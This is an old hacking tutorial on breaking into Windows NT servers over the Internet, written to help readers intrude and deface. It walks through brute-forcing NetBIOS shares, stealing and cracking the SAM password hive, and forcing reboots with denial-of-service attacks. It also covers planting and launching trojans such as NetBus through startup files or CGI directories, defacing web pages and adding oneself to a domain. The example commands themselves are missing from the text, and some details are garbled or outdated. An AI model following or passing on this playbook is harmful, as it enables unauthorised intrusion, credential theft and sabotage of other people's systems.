Security Through NT? Not Likely
by Kurruppt2k
For quite some time, hacking has meant knowing a decent amount about UNIX, or, for you old-school hackers, VMS, TSO, or whatever. Maybe you would have to know a tad about NetWare, but that was as far into the PC world as you cared to delve.
Well, it's 2000 now, and Microsoft is getting its foot into the World Wide Web, meaning the percentage of Windows NT machines on the net is increasing. A lot. Now, many of you UNIX-only hackers refuse to even glance in the direction of a Windows box, but Windows NT is only going to get bigger as time goes on, not to mention Windows 2000 (Active Directory... ooh!). And what if the web page you want to deface happens to be sitting on an Windows NT server? You're just going to have to suck it in and learn to break into Windows NT machines too.
My least favorite thing about Windows is its poor socket capabilities. This means less open ports when you scan, which means less daemons to play with, which means less points-of-entry. And if you search the exploit archives for Windows NT stuff, you won't find much besides denial-of-service (DoS) exploits and stuff that needs to be executed locally on the Windows NT LAN.
All of a sudden your ocean of UNIX hacking techniques is about 10 percent applicable in the Windows NT world. For starters, Windows NT is an NOS, meaning a client/server environment. If you Telnet to a UNIX machine and execute a command, your request is processed on that machine, using its resources. If you connect to a Windows box and issue a command, the process is launched onto your computer, using your resources, and if it's a command that reports system information, it gives you info on your own computer. How do you execute commands to be run on your target Windows machine? Suddenly these Windows NT machines seem untouchable. Not true.
How to hack an Windows NT box all depends on what exactly your goal is. With UNIX, you're usually looking to get a root shell. As I'm sure you know, you can't have a "shell" on a remote Windows NT box. Windows NT is set up to share resources - files, applications, printers, you get the idea. Meaning each workstation in its network exists as an entity in itself (vs. dumb terminals logging into a huge UNIX machine), and if it needs something from a server, you have to connect to it via NetBIOS. In Windows Networking, this means mapping a logical network drive to a particular share.
Microsoft Networking
Shares. The heart of Windows networks.
A share is just like a volume in NetWare - a directory setup to be accessed from authorized persons/workstations inside the network/internetwork. Shares can either use share-level security, or user-level security. Share level security means that the resource is protected by a single password, and anyone knowing that password can access the share. User-level security is more UNIX-ish, in that your permissions to a particular share depend on who you are logged in as. Now, this entire article refers to breaking into Windows NT over the Internet, so logging in isn't feasible (though it is possible, see the "Elite Tactics" below).
If port 139 is open though (which it almost always is on an Windows NT server, and oftentimes is on NT workstation and Windows 9x), you can use Client for Microsoft Networks to connect to it.
First make sure you have the client installed - go to Control Panel, then Network (you should also have NetBIOS, NetBEUI, and TCP/IP installed). You will use the net command to do this. Once you find your target NT machine and see an open port 139, your first step is to find out if there are any open shares.
To find out, type this at a command prompt:
If you get an error message, it probably means that the computer you attempted to connect to had no open shares (or possibly that you don't have Windows Networking set up correctly on your machine, so check!). If shares exist, you will see a list of them, including the share name, share type (disk, printer, etc.), and any comments the sysadmin wanted to mention. For more NetBIOS information on this machine, use the nbtstat command. If you see no open shares, there is still a possibility of hidden shares.
Common hidden share names include:
To connect to any share, visible or hidden, you again use the net usa command, in the following fashion:
To check for hidden shares, just try to connect to the names given above, or any others you can think of.
If it exists, you'll connect. Once you receive the "The command was completed successfully" message, you are connected to the NT machine.
Logical drive I: (or whatever drive letter you assigned) now becomes that share - you've mapped a network drive to it. This is similar to mounting remote filesystems in UNIX.
So to see what you've connected to, change to drive I: and issue a dir. You can now use any DOS commands to explore the share. The share, however, may be password protected. You may be prompted for a password right after issuing a net use, or after connecting when trying to browse the filesystem.
Typical hacker methods can be used to defeat this. If, however, you get a message that you do not have privileges to that resource (or "access denied"), this means that the share is user-level, and since you can't really log on, you won't be able to access the share.
Once in, you will have either "read" permissions, meaning you can look at or execute (launch into your RAM) a file, or "read/write," meaning you can edit any file as well. To check, make a file and delete it. Create a directory and deltree it.
Utilities
Here I will outline a few useful tools you should have when planning to break into an NT box.
Legion v2.1 is a Windows share scanner - it will automate doing net view commands on an entire subnet (or multiple subnets). Launch it, sit back, and watch as it combs networks for open shares. If you prefer doing everything from UNIX, WinHack Gold will do the same thing.
NAT (Network Auditing Tool) is a great program by the makers of Legion. It will attempt to connect to any open share you specify, attacking with passwords you provide in a wordlist. It also looks for hidden shares
L0phtCrack is an NT password cracker. Getting NT passwords can be tricky - see the "Password Cracking" section.
And finally, AGENT SMITH. This program will essentially brute-force the hell out of your target, and log all responses to a file of your choice. Oftentimes this will be your only way to break through password protection on your share. All four of these program are available at The CyberUnderground.
Password Cracking
All the hashes reside in the Security Account Manager (SAM) hive of the registry.
To get the hive, you have a few options. If you're running Windows NT yourself, you can install L0phtCrack and attempt a Remote Registry Dump. If the machine you're targeting allows for registry sharing, you will have the entire SAM hive imported into L0phtCrack.
Most often, though, this doesn't work. You could always do a core dump, convert the autopsied data into ASCII, and pick out the hashes. But that can be time consuming and messy (not to mention you'd have to upload software to perform a core dump).
So you may have to resort to going after the SAM hive stored on the hard disk of the machine (or any other Domain Controller on the network). The file you are looking for is: sam._
The problem is that NT hides this file from users and essentially disables it from being accessed while NT is running. To get it, you'll have to boot the computer to an alternate OS (Linux, DOS, etc.) and get it that way. Another problem is that the hive is on an NTFS partition. DOS, of course, uses FAT, and Linux uses ext2, so you'll need a program to access the alien partition (such as NTFSDOS). Installing another OS onto the remote machine will most likely be tough, as will forcing it to reboot, though programs exist that will do it. If nothing else, try a denial-of-service it to force it into rebooting.
So before you devise a vile plan to put DOS 6.22 and DOSREBOOT.EXE onto your target, and change the BOOT.INI, look around for backup copies of sam._. It's not unheard of to find an old copy in something like C:\WinNT\PDC\Repair. Also, if you prefer to crack passwords with UNIX, you'll have to convert the hive to a UNIX passwordd file (cut-and-paste the hashes).
FTP
The closest thing a hacker can do to Telnet into to an NT machine is connecting via FTP. The problem is that just because an account exists on the machine doesn't mean that it's allowed FTP access. So get the password hashes, crack them, and try to FTP into them all.
If the sysadmin thinks he's smart, he'll rename the Administrator (root) account. Either way, if you crack the password, you'll have FTP access with administrative privileges. You can now deface web pages, get more passwords for other computers on the network, upload Trojans, etc. Here's a trick: copy the Event Viewer program to a shared directory, then net view to it. You now have access to all logs on that machine.
Elite Tactics
Okay, let's pretend you have FTP access.
The problem is, you can't execute programs or do anything else that's any fun. The answer - a Trojan. Get one that allows you complete filesystem access, allows for screenshots of your target computer, and lets you open and kill active windows (NetBus does all of this). But how do you run the Trojan once you upload it?
You have a few options. Put it in the AUTOEXEC.BAT or AUTOEXEC.NT file, and force it into rebooting (possibly with a DoS attack), or just wait until someone reboots it.
Another ploy, if the machine is a web server: upload the Trojan into a CGI directory (cgi-win, cgi-dos, cgi-shl, etc.), then request the Trojan with a browser. If you state the path correctly, the web service will spawn (launch) the Trojan for you. Now just connect with your client, and you have complete control of the computer.
Here's another scenario. Let's say you want to hack their web page. You have a few passwords, but the FTP service has been disabled. Well, if the web pages reside in a share (unlikely) you can use MS-DOS to edit the default.htm or index.html file.
Otherwise, you can always use HTTP to upload your file. Netscape and Internet Explorer both have clients to upload HTML files via HTTP - just use the usernames and passwords you cracked. Network sniffers can also be put into place. L0phtCrack comes with SMB Packet Capture, a decent sniffer. Search the Net for other NT, Ethernet, or Token Ring sniffers. The point here is that if there is even one Windows 9x machine on the network, it sends cleartext (ASCII) passwords when authenticating, so a sniffer will always catch them. There are also a huge variety of exploits for NT. The trick is weeding through the DoS exploits and the local ones.
One remote exploit, iishack.c (www.eeye.com) theoretically will upload any file (in your case, a Trojan) right through IIS's HTTP daemon. IIS ships with most NT server packages, and comes with one of the earlier service packs. Even if the machine in question isn't a web server, it probably has IIS installed. One popular web server for NT is O'Reilly's WebSite Pro, which has a vulnerability in its packaged CGI executables. Specifically, uploader.exe allows you to upload files to the computer - without passwords.
Now, when I said that you can't log on to a NT server over the Internet, that was partially wrong. The only way to log into an NT network is to be a member of the domain. So you'll have to make your computer a member. How? Hack the Primary Domain Controller (PDC) or a Backup Domain Controller (BDC). Now, chances are if you've gotten far enough "in" to make yourself a member of the domain, you probably have all the permissions you could ever want. If not, launch the program called User Manager for Domains and add yourself, with your IP address.
In Summary
All in all, NT i s a very different environment than UNIX or VMS.
It also demands very different skills and techniques to hack. Doing so is just as rewarding as breaking into a SPARCstation, and will provide you with all kinds of new and useful information. This is, after all, why we do what we do.